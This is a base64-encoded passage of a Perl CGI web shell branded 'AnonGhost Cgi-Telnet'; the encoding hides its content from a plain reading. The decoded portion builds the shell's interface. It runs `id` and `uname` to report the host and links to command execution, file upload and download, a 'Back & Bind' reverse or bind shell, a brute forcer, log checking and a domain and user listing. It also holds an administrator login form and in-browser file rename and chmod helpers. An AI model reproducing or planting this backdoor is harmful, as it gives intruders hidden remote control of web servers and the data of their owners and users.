SkpOw0KCQkJJGlueyRrZXl9IC49ICR2YWw7DQoJCX0NCgl9DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIGZ1bmN0aW9uIEVuY29kZURpcjogZW5jb2RlIGJhc2U2NCBQYXRoDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgRW5jb2RlRGlyDQp7DQoJbXkgJGRpciA9IHNoaWZ0Ow0KCSRkaXIgPSB0cmltKGVuY29kZV9iYXNlNjQoJGRpcikpOw0KCSRkaXIgPX4gcy8oXHJ8XG4pLy87DQoJcmV0dXJuICRkaXI7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBQYWdlIEhlYWRlcg0KIyBBcmd1bWVudCAxOiBGb3JtIGl0ZW0gbmFtZSB0byB3aGljaCBmb2N1cyBzaG91bGQgYmUgc2V0DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlSGVhZGVyDQp7DQoJJEVuY29kZUN1cnJlbnREaXIgPSBFbmNvZGVEaXIoJEN1cnJlbnREaXIpOw0KCW15ICRpZCA9IGBpZGAgaWYoISRXaW5OVCk7DQoJbXkgJGluZm8gPSBgdW5hbWUgLXMgLW4gLXIgLWlgOw0KCXByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOw0KCXByaW50IDw8RU5EOw0KPGh0bWw+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04Ij4NCjx0aXRsZT5Bbm9uR2hvc3QgQ2dpLVRlbG5ldCBbICRWZXJzaW9uIF08L3RpdGxlPg0KJEh0bWxNZXRhSGVhZGVyDQo8L2hlYWQ+DQo8c3R5bGU+DQpib2R5ew0KZm9udDogMTBwdCBWZXJkYW5hOw0KY29sb3I6ICNmZmY7DQp9DQp0cix0ZCx0YWJsZSxpbnB1dCx0ZXh0YXJlYSB7DQpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLUxFRlQ6ICAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsNCn0NCiNkb21haW4gdHI6aG92ZXJ7DQpiYWNrZ3JvdW5kLWNvbG9yOiAjNDQ0Ow0KfQ0KdGQgew0KY29sb3I6ICMyQkE4RUM7DQp9DQoubGlzdGRpciB0ZHsNCgl0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQoubGlzdGRpciB0aHsNCgljb2xvcjogI0ZGOTkwMDsNCn0NCi5kaXIsLmZpbGUNCnsNCgl0ZXh0LWFsaWduOiBsZWZ0ICFpbXBvcnRhbnQ7DQp9DQouZGlyew0KCWZvbnQtc2l6ZTogMTBwdDsgDQoJZm9udC13ZWlnaHQ6IGJvbGQ7DQp9DQp0YWJsZSB7DQpCQUNLR1JPVU5ELUNPTE9SOiAjMTExOw0KfQ0KaW5wdXQgew0KQkFDS0dST1VORC1DT0xPUjogQmxhY2s7DQpjb2xvcjogI2ZmOTkwMDsNCn0NCmlucHV0LnN1Ym1pdCB7DQp0ZXh0LXNoYWRvdzogMHB0IDBwdCAwLjNlbSBjeWFuLCAwcHQgMHB0IDAuM2VtIGN5YW47DQpjb2xvcjogI0ZGRkZGRjsNCmJvcmRlci1jb2xvcjogIzAwOTkwMDsNCn0NCmNvZGUgew0KYm9yZGVyOiBkYXNoZWQgMHB4ICMzMzM7DQpjb2xvcjogd2hpbGU7DQp9DQpydW4gew0KYm9yZGVyCQkJOiBkYXNoZWQgMHB4ICMzMzM7DQpjb2xvcjogI0ZGMDBBQTsNCn0NCnRleHRhcmVhIHsNCkJBQ0tHUk9VTkQtQ09MT1I6ICMxYjFiMWI7DQpmb250OiBGaXhlZHN5cyBib2xkOw0KY29sb3I6ICNhYWE7DQp9DQpBOmxpbmsgew0KCUNPTE9SOiAjMkJBOEVDOyBURVhULURFQ09SQVRJT046IG5vbmUNCn0NCkE6dmlzaXRlZCB7DQoJQ09MT1I6ICMyQkE4RUM7IFRFWFQtREVDT1JBVElPTjogbm9uZQ0KfQ0KQTpob3ZlciB7DQoJdGV4dC1zaGFkb3c6IDBwdCAwcHQgMC4zZW0gY3lhbiwgMHB0IDBwdCAwLjNlbSBjeWFuOw0KCWNvbG9yOiAjRkZGRkZGOyBURVhULURFQ09SQVRJT046IG5vbmUNCn0NCkE6YWN0aXZlIHsNCgljb2xvcjogUmVkOyBURVhULURFQ09SQVRJT046IG5vbmUNCn0NCi5saXN0ZGlyIHRyOmhvdmVyew0KCWJhY2tncm91bmQ6ICM0NDQ7DQp9DQoubGlzdGRpciB0cjpob3ZlciB0ZHsNCgliYWNrZ3JvdW5kOiAjNDQ0Ow0KCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsNCgljb2xvcjogI0ZGRkZGRjsgVEVYVC1ERUNPUkFUSU9OOiBub25lOw0KfQ0KLm5vdGxpbmV7DQoJYmFja2dyb3VuZDogIzExMTsNCn0NCi5saW5lew0KCWJhY2tncm91bmQ6ICMyMjI7DQp9DQo8L3N0eWxlPg0KPHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQpmdW5jdGlvbiBFbmNvZGVyKG5hbWUpDQp7DQoJdmFyIGUgPSAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQobmFtZSk7DQoJZS52YWx1ZSA9IGJ0b2EoZS52YWx1ZSk7DQoJcmV0dXJuIHRydWU7DQp9DQpmdW5jdGlvbiBjaG1vZF9mb3JtKGksZmlsZSkNCnsNCglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZVBlcm1zXyIraSkuaW5uZXJIVE1MPSI8Zm9ybSBuYW1lPUZvcm1QZXJtc18iICsgaSsgIiBhY3Rpb249JycgbWV0aG9kPSdQT1NUJz48aW5wdXQgaWQ9dGV4dF8iICsgaSArICIgIG5hbWU9Y2htb2QgdHlwZT10ZXh0IHNpemU9NSAvPjxpbnB1dCB0eXBlPXN1Ym1pdCBjbGFzcz0nc3VibWl0JyB2YWx1ZT1PSz48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hIHZhbHVlPSdndWknPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWQgdmFsdWU9JyRFbmNvZGVDdXJyZW50RGlyJz48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1mIHZhbHVlPSciK2ZpbGUrIic+PC9mb3JtPiI7DQoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInRleHRfIiArIGkpLmZvY3VzKCk7DQp9DQpmdW5jdGlvbiBybV9jaG1vZF9mb3JtKHJlc3BvbnNlLGkscGVybXMsZmlsZSkNCnsNCglyZXNwb25zZS5pbm5lckhUTUwgPSAiPHNwYW4gb25jbGljaz1cXFwiY2htb2RfZm9ybSgiICsgaSArICIsJyIrIGZpbGUrICInKVxcXCIgPiIrIHBlcm1zICsiPC9zcGFuPjwvdGQ+IjsNCn0NCmZ1bmN0aW9uIHJlbmFtZV9mb3JtKGksZmlsZSxmKQ0Kew0KCWYucmVwbGFjZSgvXFxcXC9nLCJcXFxcXFxcXCIpOw0KCXZhciBiYWNrPSJybV9yZW5hbWVfZm9ybSgiK2krIixcXFwiIitmaWxlKyJcXFwiLFxcXCIiK2YrIlxcXCIpOyByZXR1cm4gZmFsc2U7IjsNCglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZV8iK2kpLmlubmVySFRNTD0iPGZvcm0gbmFtZT1Gb3JtUGVybXNfIiArIGkrICIgYWN0aW9uPScnIG1ldGhvZD0nUE9TVCc+PGlucHV0IGlkPXRleHRfIiArIGkgKyAiICBuYW1lPXJlbmFtZSB0eXBlPXRleHQgdmFsdWU9ICciK2ZpbGUrIicgLz48aW5wdXQgdHlwZT1zdWJtaXQgY2xhc3M9J3N1Ym1pdCcgdmFsdWU9T0s+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBiYWNrICsgIicgdmFsdWU9Q2FuY2VsPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJEVuY29kZUN1cnJlbnREaXInPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWYgdmFsdWU9JyIrZmlsZSsiJz48L2Zvcm0+IjsNCglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgidGV4dF8iICsgaSkuZm9jdXMoKTsNCn0NCmZ1bmN0aW9uIHJtX3JlbmFtZV9mb3JtKGksZmlsZSxmKQ0Kew0KCWlmKGY9PSdmJykNCgl7DQoJCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJGaWxlXyIraSkuaW5uZXJIVE1MPSI8YSBocmVmPSc/YT1jb21tYW5kJmQ9JEVuY29kZUN1cnJlbnREaXImYz1lZGl0JTIwIitmaWxlKyIlMjAnPiIgK2ZpbGUrICI8L2E+IjsNCgl9ZWxzZQ0KCXsNCgkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9IjxhIGhyZWY9Jz9hPWd1aSZkPSIrZisiJz5bICIgK2ZpbGUrICIgXTwvYT4iOw0KCX0NCn0NCjwvc2NyaXB0Pg0KPGJvZHkgb25Mb2FkPSJkb2N1bWVudC5mLkBfLmZvY3VzKCkiIGJnY29sb3I9IiMwYzBjMGMiIHRvcG1hcmdpbj0iMCIgbGVmdG1hcmdpbj0iMCIgbWFyZ2lud2lkdGg9IjAiIG1hcmdpbmhlaWdodD0iMCI+DQo8Y2VudGVyPjxjb2RlPg0KPHRhYmxlIGJvcmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+DQo8dHI+DQoJPHRkIGFsaWduPSJjZW50ZXIiIHJvd3NwYW49Mz4NCgkJPGI+PGZvbnQgc2l6ZT0iMyI+by0tLVsgICRFZGl0UGVyc2lvbiBdLS0tbzwvZm9udD48L2I+DQoJPC90ZD4NCgk8dGQ+DQoJCSRpbmZvDQoJPC90ZD4NCgk8dGQ+U2VydmVyIElQOjxmb250IGNvbG9yPSIjZmY5OTAwIj4gJEVOVnsnU0VSVkVSX0FERFInfTwvZm9udD4gfCBZb3VyIElQOiA8Zm9udCBjb2xvcj0iI2ZmOTkwMCI+JEVOVnsnUkVNT1RFX0FERFInfTwvZm9udD4NCgk8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZCBjb2xzcGFuPSIyIj4NCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbiI+SG9tZTwvYT4gfCANCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWNvbW1hbmQmZD0kRW5jb2RlQ3VycmVudERpciI+Q29tbWFuZDwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9Z3VpJmQ9JEVuY29kZUN1cnJlbnREaXIiPkdVSTwvYT4gfCANCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPXVwbG9hZCZkPSRFbmNvZGVDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCANCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmQ9JEVuY29kZUN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWJhY2tiaW5kIj5CYWNrICYgQmluZDwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9YnJ1dGVmb3JjZXIiPkJydXRlIEZvcmNlcjwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9Y2hlY2tsb2ciPkNoZWNrIExvZzwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG9tYWluc3VzZXIiPkRvbWFpbnMvVXNlcnM8L2E+IHwNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWxvZ291dCI+TG9nb3V0PC9hPiB8DQo8YSB0YXJnZXQ9J19ibGFuaycgaHJlZj0iIyI+SGVscDwvYT4NCjwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkIGNvbHNwYW49IjIiPg0KJGlkDQo8L3RkPg0KPC90cj4NCjwvdGFibGU+DQo8Zm9udCBpZD0iUmVzcG9uc2VEYXRhIiBjb2xvcj0iI0ZGRkZGRiIgPg0KRU5EDQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgTG9naW4gU2NyZWVuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRMb2dpblNjcmVlbg0Kew0KCXByaW50IDw8RU5EOw0KPHByZT48c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+DQpUeXBpbmdUZXh0ID0gZnVuY3Rpb24oZWxlbWVudCwgaW50ZXJ2YWwsIGN1cnNvciwgZmluaXNoZWRDYWxsYmFjaykgew0KICBpZigodHlwZW9mIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkID09ICJ1bmRlZmluZWQiKSB8fCAodHlwZW9mIGVsZW1lbnQuaW5uZXJIVE1MID09ICJ1bmRlZmluZWQiKSkgew0KICAgIHRoaXMucnVubmluZyA9IHRydWU7CS8vIE5ldmVyIHJ1bi4NCiAgICByZXR1cm47DQogIH0NCiAgdGhpcy5lbGVtZW50ID0gZWxlbWVudDsNCiAgdGhpcy5maW5pc2hlZENhbGxiYWNrID0gKGZpbmlzaGVkQ2FsbGJhY2sgPyBmaW5pc2hlZENhbGxiYWNrIDogZnVuY3Rpb24oKSB7IHJldHVybjsgfSk7DQogIHRoaXMuaW50ZXJ2YWwgPSAodHlwZW9mIGludGVydmFsID09ICJ1bmRlZmluZWQiID8gMTAwIDogaW50ZXJ2YWwpOw0KICB0aGlzLm9yaWdUZXh0ID0gdGhpcy5lbGVtZW50LmlubmVySFRNTDsNCiAgdGhpcy51bnBhcnNlZE9yaWdUZXh0ID0gdGhpcy5vcmlnVGV4dDsNCiAgdGhpcy5jdXJzb3IgPSAoY3Vyc29yID8gY3Vyc29yIDogIiIpOw0KICB0aGlzLmN1cnJlbnRUZXh0ID0gIiI7DQogIHRoaXMuY3VycmVudENoYXIgPSAwOw0KICB0aGlzLmVsZW1lbnQudHlwaW5nVGV4dCA9IHRoaXM7DQogIGlmKHRoaXMuZWxlbWVudC5pZCA9PSAiIikgdGhpcy5lbGVtZW50LmlkID0gInR5cGluZ3RleHQiICsgVHlwaW5nVGV4dC5jdXJyZW50SW5kZXgrKzsNCiAgVHlwaW5nVGV4dC5hbGwucHVzaCh0aGlzKTsNCiAgdGhpcy5ydW5uaW5nID0gZmFsc2U7DQogIHRoaXMuaW5UYWcgPSBmYWxzZTsNCiAgdGhpcy50YWdCdWZmZXIgPSAiIjsNCiAgdGhpcy5pbkhUTUxFbnRpdHkgPSBmYWxzZTsNCiAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiI7DQp9DQpUeXBpbmdUZXh0LmFsbCA9IG5ldyBBcnJheSgpOw0KVHlwaW5nVGV4dC5jdXJyZW50SW5kZXggPSAwOw0KVHlwaW5nVGV4dC5ydW5BbGwgPSBmdW5jdGlvbigpIHsNCiAgZm9yKHZhciBpID0gMDsgaSA8IFR5cGluZ1RleHQuYWxsLmxlbmd0aDsgaSsrKSBUeXBpbmdUZXh0LmFsbFtpXS5ydW4oKTsNCn0NClR5cGluZ1RleHQucHJvdG90eXBlLnJ1biA9IGZ1bmN0aW9uKCkgew0KICBpZih0aGlzLnJ1bm5pbmcpIHJldHVybjsNCiAgaWYodHlwZW9mIHRoaXMub3JpZ1RleHQgPT0gInVuZGVmaW5lZCIpIHsNCiAgICBzZXRUaW1lb3V0KCJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnIiArIHRoaXMuZWxlbWVudC5pZCArICInKS50eXBpbmdUZXh0LnJ1bigpIiwgdGhpcy5pbnRlcnZhbCk7CS8vIFdlIGhhdmVuJ3QgZmluaXNoZWQgbG9hZGluZyB5ZXQuICBIYXZlIHBhdGllbmNlLg0KICAgIHJldHVybjsNCiAgfQ0KICBpZih0aGlzLmN1cnJlbnRUZXh0ID09ICIiKSB0aGlzLmVsZW1lbnQuaW5uZXJIVE1MID0gIiI7DQovLyAgdGhpcy5vcmlnVGV4dCA9IHRoaXMub3JpZ1RleHQucmVwbGFjZSgvPChbXjxdKSo+LywgIiIpOyAgICAgLy8gU3RyaXAgSFRNTCBmcm9tIHRleHQuDQogIGlmKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCkgew0KICAgIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI8IiAmJiAhdGhpcy5pblRhZykgew0KICAgICAgdGhpcy50YWdCdWZmZXIgPSAiPCI7DQogICAgICB0aGlzLmluVGFnID0gdHJ1ZTsNCiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsNCiAgICAgIHRoaXMucnVuKCk7DQogICAgICByZXR1cm47DQogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI+IiAmJiB0aGlzLmluVGFnKSB7DQogICAgICB0aGlzLnRhZ0J1ZmZlciArPSAiPiI7DQogICAgICB0aGlzLmluVGFnID0gZmFsc2U7DQogICAgICB0aGlzLmN1cnJlbnRUZXh0ICs9IHRoaXMudGFnQnVmZmVyOw0KICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOw0KICAgICAgdGhpcy5ydW4oKTsNCiAgICAgIHJldHVybjsNCiAgICB9IGVsc2UgaWYodGhpcy5pblRhZykgew0KICAgICAgdGhpcy50YWdCdWZmZXIgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7DQogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7DQogICAgICB0aGlzLnJ1bigpOw0KICAgICAgcmV0dXJuOw0KICAgIH0gZWxzZSBpZih0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKSA9PSAiJiIgJiYgIXRoaXMuaW5IVE1MRW50aXR5KSB7DQogICAgICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgPSAiJiI7DQogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IHRydWU7DQogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7DQogICAgICB0aGlzLnJ1bigpOw0KICAgICAgcmV0dXJuOw0KICAgIH0gZWxzZSBpZih0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKSA9PSAiOyIgJiYgdGhpcy5pbkhUTUxFbnRpdHkpIHsNCiAgICAgIHRoaXMuSFRNTEVudGl0eUJ1ZmZlciArPSAiOyI7DQogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IGZhbHNlOw0KICAgICAgdGhpcy5jdXJyZW50VGV4dCArPSB0aGlzLkhUTUxFbnRpdHlCdWZmZXI7DQogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7DQogICAgICB0aGlzLnJ1bigpOw0KICAgICAgcmV0dXJuOw0KICAgIH0gZWxzZSBpZih0aGlzLmluSFRNTEVudGl0eSkgew0KICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyICs9IHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpOw0KICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOw0KICAgICAgdGhpcy5ydW4oKTsNCiAgICAgIHJldHVybjsNCiAgICB9IGVsc2Ugew0KICAgICAgdGhpcy5jdXJyZW50VGV4dCArPSB0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKTsNCiAgICB9DQogICAgdGhpcy5lbGVtZW50LmlubmVySFRNTCA9IHRoaXMuY3VycmVudFRleHQ7DQogICAgdGhpcy5lbGVtZW50LmlubmVySFRNTCArPSAodGhpcy5jdXJyZW50Q2hhciA8IHRoaXMub3JpZ1RleHQubGVuZ3RoIC0gMSA/ICh0eXBlb2YgdGhpcy5jdXJzb3IgPT0gImZ1bmN0aW9uIiA/IHRoaXMuY3Vyc29yKHRoaXMuY3VycmVudFRleHQpIDogdGhpcy5jdXJzb3IpIDogIiIpOw0KICAgIHRoaXMuY3VycmVudENoYXIrKzsNCiAgICBzZXRUaW1lb3V0KCJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnIiArIHRoaXMuZWxlbWVudC5pZCArICInKS50eXBpbmdUZXh0LnJ1bigpIiwgdGhpcy5pbnRlcnZhbCk7DQogIH0gZWxzZSB7DQoJdGhpcy5jdXJyZW50VGV4dCA9ICIiOw0KCXRoaXMuY3VycmVudENoYXIgPSAwOw0KICAgICAgICB0aGlzLnJ1bm5pbmcgPSBmYWxzZTsNCiAgICAgICAgdGhpcy5maW5pc2hlZENhbGxiYWNrKCk7DQogIH0NCn0NCjwvc2NyaXB0Pg0KPC9wcmU+DQoNCjxicj4NCg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KbmV3IFR5cGluZ1RleHQoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImhhY2siKSwgMzAsIGZ1bmN0aW9uKGkpeyB2YXIgYXIgPSBuZXcgQXJyYXkoIl8iLCIiKTsgcmV0dXJuICIgIiArIGFyW2kubGVuZ3RoICUgYXIubGVuZ3RoXTsgfSk7DQpUeXBpbmdUZXh0LnJ1bkFsbCgpOw0KDQo8L3NjcmlwdD4NCkVORA0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBlbmNvZGUgaHRtbCBzcGVjaWFsIGNoYXJzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgVXJsRW5jb2RlKCQpew0KCW15ICRzdHIgPSBzaGlmdDsNCgkkc3RyID1+IHMvKFteQS1aYS16MC05XSkvc3ByaW50ZigiJSUlMDJYIiwgb3JkKCQxKSkvc2VnOw0KCXJldHVybiAkc3RyOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBBZGQgaHRtbCBzcGVjaWFsIGNoYXJzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgSHRtbFNwZWNpYWxDaGFycygkKXsNCglteSAkdGV4dCA9IHNoaWZ0Ow0KCSR0ZXh0ID1+IHMvJi8mYW1wOy9nOw0KCSR0ZXh0ID1+IHMvIi8mcXVvdDsvZzsNCgkkdGV4dCA9fiBzLycvJy9nOw0KCSR0ZXh0ID1+IHMvPC8mbHQ7L2c7DQoJJHRleHQgPX4gcy8+LyZndDsvZzsNCglyZXR1cm4gJHRleHQ7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIEFkZCBsaW5rIGZvciBkaXJlY3RvcnkNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBBZGRMaW5rRGlyKCQpDQp7DQoJbXkgJGFjPXNoaWZ0Ow0KCW15IEBkaXI9KCk7DQoJaWYoJFdpbk5UKQ0KCXsNCgkJQGRpcj1zcGxpdCgvXFwvLCRDdXJyZW50RGlyKTsNCgl9ZWxzZQ0KCXsNCgkJQGRpcj1zcGxpdCgiLyIsJnRyaW0oJEN1cnJlbnREaXIpKTsNCgl9DQoJbXkgJHBhdGg9IiI7DQoJbXkgJHJlc3VsdD0iIjsNCglmb3JlYWNoIChAZGlyKQ0KCXsNCgkJJHBhdGggLj0gJF8uJFBhdGhTZXA7DQoJCSRyZXN1bHQuPSI8YSBocmVmPSc/YT0iLiRhYy4iJmQ9Ii5lbmNvZGVfYmFzZTY0KCRwYXRoKS4iJz4iLiRfLiRQYXRoU2VwLiI8L2E+IjsNCgl9DQoJcmV0dXJuICRyZXN1bHQ7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXByaW50IDw8RU5EOw0KDQpQYXNzd29yZDo8YnI+DQpMb2dpbiBpbmNvcnJlY3Q8YnI+PGJyPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gZm9yIGxvZ2dpbmcgaW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ2luRm9ybQ0Kew0KCXByaW50IDw8RU5EOw0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0ibG9naW4iPg0KTG9naW4gOiBBZG1pbmlzdHJhdG9yPGJyPg0KUGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4NCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFbnRlciI+DQo8L2Zvcm0+DQpFTkQNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBmb290ZXIgZm9yIHRoZSBIVE1MIFBhZ2UNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludFBhZ2VGb290ZXINCnsNCglwcmludCAiPGJyPjxmb250IGNvbG9yPXJlZD5vLS0tWyAgPGZvbnQgY29sb3I9I2ZmOTkwMD5FZGl0IGJ5ICRFZGl0UGVyc2lvbiA8L2ZvbnQ+ICBdLS0tbzwvZm9udD48L2NvZGU+PC9jZW50ZXI+PC9ib2R5PjwvaHRtbD4iOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBSZXRyZWl2ZXMgdGhlIHZhbHVlcyBvZiBhbGwgY29va2llcy4gVGhlIGNvb2tpZXMgY2FuIGJlIGFjY2Vzc2VzIHVzaW5nIHRoZQ0KIyB2YXJpYWJsZSAkQ29va2llc3snJ30NCiM